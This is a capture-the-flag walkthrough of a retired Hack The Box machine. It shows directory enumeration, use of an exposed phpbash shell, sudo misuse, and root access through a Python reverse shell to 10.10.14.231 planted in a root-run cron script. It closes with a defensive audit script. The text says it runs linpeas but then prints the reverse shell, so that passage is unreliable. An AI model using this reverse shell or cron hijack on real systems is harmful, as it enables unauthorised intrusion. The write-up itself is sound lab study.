In this next phase I’ll enumerate the webpage for possible web content:
```
┌──(root💀CSEC)-[/home/cyborgbytes/Documents/Writeups/RetiredHTB]
└─# gobuster dir -u http://10.129.148.228/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```
From this enumeration technique we were able to find a bunch of interesting information which will possibly lead us to very interesting rabbit holes or, to put it in a different perspective, “ninja glory”.
Let's break down what we found in some context.
The following web directories were found:
```
/css
/dev
/fonts
/images
/index.html
/js
/php
/server-status
/uploads
```
The most interesting web directories I have my eyes on are the following:
```
/dev
/php
/uploads
```
Let's examine those directories closer…
I found something very interesting in the dev directory.
Through the dev page I found interesting phpbash PHP files. When I clicked on phpbash.php I got into a shell where I can interact with the file system. Surprisingly, I can access and read the user.txt file but not the root one, so I have to find a way to get initial access anyhow.
First we check what can be run with sudo:
```
www-data@bashed:/tmp$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
```
From what I can see, I can read user.txt in the user directory, which is arrexel. Let's find a way to get the user by exploring our options in this box.
Since we can run sudo as scriptmanager on this machine, I could try the following command to spawn a shell as scriptmanager:
```
sudo -u scriptmanager bash
```
And there we go, here we are as the scriptmanager user.
To get root access I would run a really interesting tool that checks for possible priv esc methods. This tool is called linpeas; it's available for Windows and Linux machines.
By running the following commands I could run and execute the privilege escalation script to look for possible privilege escalation vectors:
```
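import socket, subprocess, os

# Connect back to the listener
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.231", 999))
# Point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Start an interactive shell over the connection
p = subprocess.call(["/bin/sh", "-i"])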
```
By going to the script directory we can find that there are two files, test.py and test.txt. It's basically a cronjob that is running every minute; if we edit the Python file we could have a reverse shell as root because it's owned by root.
By editing this file with the Python reverse shell above we could get a reverse shell successfully.
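The cron job finding above comes down to a root-run job executing scripts that a lower-privileged account can edit. The following audit is an added example, not part of the original writeup: it flags scripts in a job directory whose file or containing directory is owned by, or writable for, someone other than the job's account. The function names and the sample directory are hypothetical and constructed for the demo.

```python
import os
import stat
import tempfile


def audit_job_target(path, trusted_uid=0):
    """List reasons an account other than trusted_uid could change `path`."""
    findings = []
    parent = os.path.dirname(os.path.abspath(path))
    for kind, target in (("file", path), ("directory", parent)):
        st = os.stat(target)
        if st.st_uid != trusted_uid:
            findings.append(f"{kind} owned by uid {st.st_uid}")
        if st.st_mode & stat.S_IWGRP:
            findings.append(f"{kind} is group-writable")
        if st.st_mode & stat.S_IWOTH:
            findings.append(f"{kind} is world-writable")
    return findings


def audit_job_directory(directory, suffix=".py", trusted_uid=0):
    """Map each script the job would pick up to its findings (clean files omitted)."""
    report = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(suffix):
            issues = audit_job_target(os.path.join(directory, name), trusted_uid)
            if issues:
                report[name] = issues
    return report


def build_demo_tree():
    """Constructed sample directory: one tightly scoped script, one loose one."""
    base = tempfile.mkdtemp()
    os.chmod(base, 0o755)
    for name, mode in (("locked.py", 0o644), ("test.py", 0o666)):
        script = os.path.join(base, name)
        with open(script, "w") as fh:
            fh.write("print('scheduled job')\n")
        os.chmod(script, mode)
    return base


if __name__ == "__main__":
    # The demo files belong to whoever runs this, so treat that uid as trusted;
    # on a real host keep the default trusted_uid=0 for a root cron job.
    demo = build_demo_tree()
    for script, issues in audit_job_directory(demo, trusted_uid=os.getuid()).items():
        print(script, "->", "; ".join(issues))
```

Any script reported here should be owned by the job's account and stripped of group and world write bits, and the same applies to the directory that holds it.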